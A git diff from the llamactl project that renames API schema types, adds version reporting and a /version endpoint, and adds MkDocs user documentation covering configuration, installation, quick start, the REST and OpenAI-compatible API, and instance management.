"type": "string" "type": "string"
}, },
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"override_kv": { "override_kv": {
"type": "array", "type": "array",
"items": { "items": {
@@ -1020,10 +1055,10 @@
"presence_penalty": { "presence_penalty": {
"type": "number" "type": "number"
}, },
"priority": { "prio": {
"type": "integer" "type": "integer"
}, },
"priority_batch": { "prio_batch": {
"type": "integer" "type": "integer"
}, },
"props": { "props": {
@@ -1044,8 +1079,7 @@
"reranking": { "reranking": {
"type": "boolean" "type": "boolean"
}, },
"restart_delay_seconds": { "restart_delay": {
"description": "RestartDelay duration in seconds",
"type": "integer" "type": "integer"
}, },
"rope_freq_base": { "rope_freq_base": {
@@ -1094,7 +1128,7 @@
"ssl_key_file": { "ssl_key_file": {
"type": "string" "type": "string"
}, },
"temperature": { "temp": {
"type": "number" "type": "number"
}, },
"tensor_split": { "tensor_split": {
@@ -1160,7 +1194,20 @@
} }
} }
}, },
"llamactl.Instance": { "instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": {
"type": "object", "type": "object",
"properties": { "properties": {
"created": { "created": {
@@ -1170,13 +1217,17 @@
"name": { "name": {
"type": "string" "type": "string"
}, },
"running": { "status": {
"description": "Status", "description": "Status",
"type": "boolean" "allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
} }
} }
}, },
"llamactl.OpenAIInstance": { "server.OpenAIInstance": {
"type": "object", "type": "object",
"properties": { "properties": {
"created": { "created": {
@@ -1193,13 +1244,13 @@
} }
} }
}, },
"llamactl.OpenAIListInstancesResponse": { "server.OpenAIListInstancesResponse": {
"type": "object", "type": "object",
"properties": { "properties": {
"data": { "data": {
"type": "array", "type": "array",
"items": { "items": {
"$ref": "#/definitions/llamactl.OpenAIInstance" "$ref": "#/definitions/server.OpenAIInstance"
} }
}, },
"object": { "object": {

View File

@@ -1,6 +1,6 @@
basePath: /api/v1 basePath: /api/v1
definitions: definitions:
llamactl.CreateInstanceOptions: instance.CreateInstanceOptions:
properties: properties:
alias: alias:
type: string type: string
@@ -66,7 +66,6 @@ definitions:
device_draft: device_draft:
type: string type: string
draft_max: draft_max:
description: Speculative decoding params
type: integer type: integer
draft_min: draft_min:
type: integer type: integer
@@ -137,6 +136,9 @@ definitions:
type: string type: string
host: host:
type: string type: string
idle_timeout:
description: Idle timeout
type: integer
ignore_eos: ignore_eos:
type: boolean type: boolean
jinja: jinja:
@@ -203,7 +205,7 @@ definitions:
no_cont_batching: no_cont_batching:
type: boolean type: boolean
no_context_shift: no_context_shift:
description: Server/Example-specific params description: Example-specific params
type: boolean type: boolean
no_escape: no_escape:
type: boolean type: boolean
@@ -227,6 +229,9 @@ definitions:
type: boolean type: boolean
numa: numa:
type: string type: string
on_demand_start:
description: On demand start
type: boolean
override_kv: override_kv:
items: items:
type: string type: string
@@ -251,9 +256,9 @@ definitions:
type: integer type: integer
presence_penalty: presence_penalty:
type: number type: number
priority: prio:
type: integer type: integer
priority_batch: prio_batch:
type: integer type: integer
props: props:
type: boolean type: boolean
@@ -267,8 +272,7 @@ definitions:
type: number type: number
reranking: reranking:
type: boolean type: boolean
restart_delay_seconds: restart_delay:
description: RestartDelay duration in seconds
type: integer type: integer
rope_freq_base: rope_freq_base:
type: number type: number
@@ -301,7 +305,7 @@ definitions:
type: string type: string
ssl_key_file: ssl_key_file:
type: string type: string
temperature: temp:
type: number type: number
tensor_split: tensor_split:
type: string type: string
@@ -345,18 +349,29 @@ definitions:
yarn_orig_ctx: yarn_orig_ctx:
type: integer type: integer
type: object type: object
llamactl.Instance: instance.InstanceStatus:
enum:
- 0
- 1
- 2
type: integer
x-enum-varnames:
- Stopped
- Running
- Failed
instance.Process:
properties: properties:
created: created:
description: Creation time description: Creation time
type: integer type: integer
name: name:
type: string type: string
running: status:
allOf:
- $ref: '#/definitions/instance.InstanceStatus'
description: Status description: Status
type: boolean
type: object type: object
llamactl.OpenAIInstance: server.OpenAIInstance:
properties: properties:
created: created:
type: integer type: integer
@@ -367,11 +382,11 @@ definitions:
owned_by: owned_by:
type: string type: string
type: object type: object
llamactl.OpenAIListInstancesResponse: server.OpenAIListInstancesResponse:
properties: properties:
data: data:
items: items:
$ref: '#/definitions/llamactl.OpenAIInstance' $ref: '#/definitions/server.OpenAIInstance'
type: array type: array
object: object:
type: string type: string
@@ -393,7 +408,7 @@ paths:
description: List of instances description: List of instances
schema: schema:
items: items:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
type: array type: array
"500": "500":
description: Internal Server Error description: Internal Server Error
@@ -441,7 +456,7 @@ paths:
"200": "200":
description: Instance details description: Instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid name format description: Invalid name format
schema: schema:
@@ -470,12 +485,12 @@ paths:
name: options name: options
required: true required: true
schema: schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions' $ref: '#/definitions/instance.CreateInstanceOptions'
responses: responses:
"201": "201":
description: Created instance details description: Created instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid request body description: Invalid request body
schema: schema:
@@ -504,12 +519,12 @@ paths:
name: options name: options
required: true required: true
schema: schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions' $ref: '#/definitions/instance.CreateInstanceOptions'
responses: responses:
"200": "200":
description: Updated instance details description: Updated instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid name format description: Invalid name format
schema: schema:
@@ -627,7 +642,7 @@ paths:
"200": "200":
description: Restarted instance details description: Restarted instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid name format description: Invalid name format
schema: schema:
@@ -654,7 +669,7 @@ paths:
"200": "200":
description: Started instance details description: Started instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid name format description: Invalid name format
schema: schema:
@@ -681,7 +696,7 @@ paths:
"200": "200":
description: Stopped instance details description: Stopped instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid name format description: Invalid name format
schema: schema:
@@ -777,7 +792,7 @@ paths:
"200": "200":
description: List of OpenAI-compatible instances description: List of OpenAI-compatible instances
schema: schema:
$ref: '#/definitions/llamactl.OpenAIListInstancesResponse' $ref: '#/definitions/server.OpenAIListInstancesResponse'
"500": "500":
description: Internal Server Error description: Internal Server Error
schema: schema:
@@ -787,4 +802,21 @@ paths:
summary: List instances in OpenAI-compatible format summary: List instances in OpenAI-compatible format
tags: tags:
- openai - openai
/version:
get:
description: Returns the version of the llamactl command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get llamactl version
tags:
- version
swagger: "2.0" swagger: "2.0"

View File

@@ -11,6 +11,11 @@ import (
"syscall" "syscall"
) )
// version is set at build time using -ldflags "-X main.version=1.0.0"
var version string = "unknown"
var commitHash string = "unknown"
var buildTime string = "unknown"
// @title llamactl API // @title llamactl API
// @version 1.0 // @version 1.0
// @description llamactl is a control server for managing Llama Server instances. // @description llamactl is a control server for managing Llama Server instances.
@@ -19,6 +24,14 @@ import (
// @basePath /api/v1 // @basePath /api/v1
func main() { func main() {
// --version flag to print the version
if len(os.Args) > 1 && os.Args[1] == "--version" {
fmt.Printf("llamactl version: %s\n", version)
fmt.Printf("Commit hash: %s\n", commitHash)
fmt.Printf("Build time: %s\n", buildTime)
return
}
configPath := os.Getenv("LLAMACTL_CONFIG_PATH") configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
cfg, err := config.LoadConfig(configPath) cfg, err := config.LoadConfig(configPath)
if err != nil { if err != nil {
@@ -26,6 +39,11 @@ func main() {
fmt.Println("Using default configuration.") fmt.Println("Using default configuration.")
} }
// Set version information
cfg.Version = version
cfg.CommitHash = commitHash
cfg.BuildTime = buildTime
// Create the data directory if it doesn't exist // Create the data directory if it doesn't exist
if cfg.Instances.AutoCreateDirs { if cfg.Instances.AutoCreateDirs {
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil { if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {

4
docs-requirements.txt Normal file
View File

@@ -0,0 +1,4 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4

View File

@@ -0,0 +1,150 @@
# Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
llamactl works out of the box with sensible defaults, but you can customize the behavior to suit your needs.
## Default Configuration
Here's the default configuration with all available options:
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/Library/Application Support/llamactl/config.yaml`
- `/Library/Application Support/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
## Configuration Options
### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
max_running_instances: -1 # Maximum running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_MAX_RUNNING_INSTANCES` - Maximum number of running instances
- `LLAMACTL_ENABLE_LRU_EVICTION` - Enable LRU eviction for idle instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
## Command Line Options
View all available command line options:
```bash
llamactl --help
```
You can also override configuration using command line flags when starting llamactl.

View File

@@ -0,0 +1,70 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
**Quick install methods:**
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!

View File

@@ -0,0 +1,143 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Login with the management API key. By default it is generated during server startup. Copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Model Path**: Path to your Llama.cpp model file
- **Additional Options**: Any extra Llama.cpp parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configuration
Here's a basic example configuration for a Llama 2 model:
```json
{
"name": "llama2-7b",
"model_path": "/path/to/llama-2-7b-chat.gguf",
"options": {
"threads": 4,
"context_size": 2048
}
}
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/instances
# Create a new instance
curl -X POST http://localhost:8080/api/instances \
-H "Content-Type: application/json" \
-d '{
"name": "my-model",
"model_path": "/path/to/model.gguf",
}'
# Start an instance
curl -X POST http://localhost:8080/api/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Manage instances [Managing Instances](../user-guide/managing-instances.md)
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

Binary file not shown.

After

Width:  |  Height:  |  Size: 69 KiB

BIN
docs/images/dashboard.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 44 KiB

41
docs/index.md Normal file
View File

@@ -0,0 +1,41 @@
# Llamactl Documentation
Welcome to the Llamactl documentation! **Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
![Dashboard Screenshot](images/dashboard.png)
## What is Llamactl?
Llamactl is designed to simplify the deployment and management of llama-server instances. It provides a modern solution for running multiple large language models with centralized management.
## Features
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
## License
MIT License - see the [LICENSE](https://github.com/lordmathis/llamactl/blob/main/LICENSE) file.

View File

@@ -0,0 +1,412 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/server/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/server/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/server/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "starting",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopping",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "restarting",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (default: all lines, use -1 for all)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing model name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"model": "/models/llama-2-7b.gguf"
}'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.

View File

@@ -0,0 +1,190 @@
# Managing Instances
Learn how to effectively manage your Llama.cpp instances with Llamactl through both the Web UI and API.
## Overview
Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
### Authentication
If authentication is enabled:
1. Navigate to the web UI
2. Enter your credentials
3. Bearer token is stored for the session
### Theme Support
- Switch between light and dark themes
- Setting is remembered across sessions
## Instance Cards
Each instance is displayed as a card showing:
- **Instance name**
- **Health status badge** (unknown, ready, error, failed)
- **Action buttons** (start, stop, edit, logs, delete)
## Create Instance
### Via Web UI
![Create Instance Screenshot](../images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. Enter a unique **Name** for your instance (only required field)
3. Configure model source (choose one):
- **Model Path**: Full path to your downloaded GGUF model file
- **HuggingFace Repo**: Repository name (e.g., `unsloth/gemma-3-27b-it-GGUF`)
- **HuggingFace File**: Specific file within the repo (optional, uses default if not specified)
4. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
5. Configure optional llama-server backend options:
- **Threads**: Number of CPU threads to use
- **Context Size**: Context window size (ctx_size)
- **GPU Layers**: Number of layers to offload to GPU
- **Port**: Network port (auto-assigned by llamactl if not specified)
- **Additional Parameters**: Any other llama-server command line options (see [llama-server documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/server/README.md))
6. Click **"Create"** to save the instance
### Via API
```bash
# Create instance with local model file
curl -X POST http://localhost:8080/api/instances/my-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"threads": 8,
"ctx_size": 4096
}
}'
# Create instance with HuggingFace model
curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
},
"auto_restart": true,
"max_restarts": 3
}'
```
## Start Instance
### Via Web UI
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
4. Instance status changes to "Ready" when ready
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/start
```
## Stop Instance
### Via Web UI
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/stop
```
## Edit Instance
### Via Web UI
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/instances/{name} \
-H "Content-Type: application/json" \
-d '{
"backend_options": {
"threads": 8,
"context_size": 4096
}
}'
```
!!! note
Configuration changes require restarting the instance to take effect.
## View Logs
### Via Web UI
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
Check instance status in real-time:
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/logs
```
## Delete Instance
### Via Web UI
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
```bash
curl -X DELETE http://localhost:8080/api/instances/{name}
```
## Instance Proxy
Llamactl proxies all requests to the underlying llama-server instances.
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/proxy/
```
